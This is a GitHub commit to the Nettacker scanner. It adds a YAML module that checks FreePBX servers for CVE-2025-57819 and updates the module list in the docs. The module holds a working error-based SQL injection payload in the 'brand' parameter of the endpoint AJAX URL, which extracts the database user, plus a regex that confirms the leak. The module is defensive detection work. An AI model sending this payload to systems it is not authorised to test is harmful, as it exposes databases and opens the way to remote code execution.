Skip to content

Commit 755ad9f

Browse files
committed
Added new vulnerability module for CVE-2025-57819
1 parent 3727458 commit 755ad9f

File tree

2 files changed

+51
-0
lines changed

2 files changed

+51
-0
lines changed

docs/Modules.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -161,6 +161,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
161161
- '**ProFTPd_integer_overflow_vuln**' - check ProFTPd for CVE-2011-1137
162162
- '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
163163
- '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
164+
- '**sangoma_freepbx_cve_2025_57819_vuln**' - check target for CVE-2025-57819
164165
- '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
165166
- '**smartermail_cve_2026_24423_vuln**' - check the target for SmarterMail CVE-2026-24423 vulnerability
166167
- '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
Lines changed: 50 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
info:
2+
name: sangoma_freepbx_cve_2025_57819_vuln
3+
author: Sankalp Bansal
4+
severity: 9.8
5+
description: >
6+
CVE-2025-57819 is a critical vulnerability in FreePBX 15, 16, 17.
7+
Improper sanitization in the brand parameter of the endpoint
8+
module leads to SQLi and Remote Code Execution possibly leading
9+
to root privileges.
10+
reference:
11+
- https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/
12+
- https://nvd.nist.gov/vuln/detail/CVE-2025-57819
13+
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819/blob/main/README.md
14+
profiles:
15+
- vuln
16+
- http
17+
- critical_severity
18+
- cve
19+
- cve_2025
20+
- sangoma
21+
- freepbx
22+
- cisa_kev
23+
24+
payloads:
25+
- library: http
26+
steps:
27+
- method: get
28+
timeout: 3
29+
headers:
30+
User-Agent: "{{ user_agent }}"
31+
ssl: false
32+
url:
33+
nettacker_fuzzer:
34+
input_format: "{{schema}}://{target}:{{ports}}/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT('~USER:',(SELECT USER()),'~')) -- "
35+
prefix: ""
36+
suffix: ""
37+
interceptors:
38+
data:
39+
schema:
40+
- "http"
41+
- "https"
42+
ports:
43+
- 80
44+
- 443
45+
response:
46+
condition_type: and
47+
conditions:
48+
content:
49+
regex: (?s)(?=.*XPATH syntax error.*~.*~)(?=.*utility\.functions\.php)(?=.*~USER:([^~]+)~)
50+
reverse: false

0 commit comments

Comments
 (0)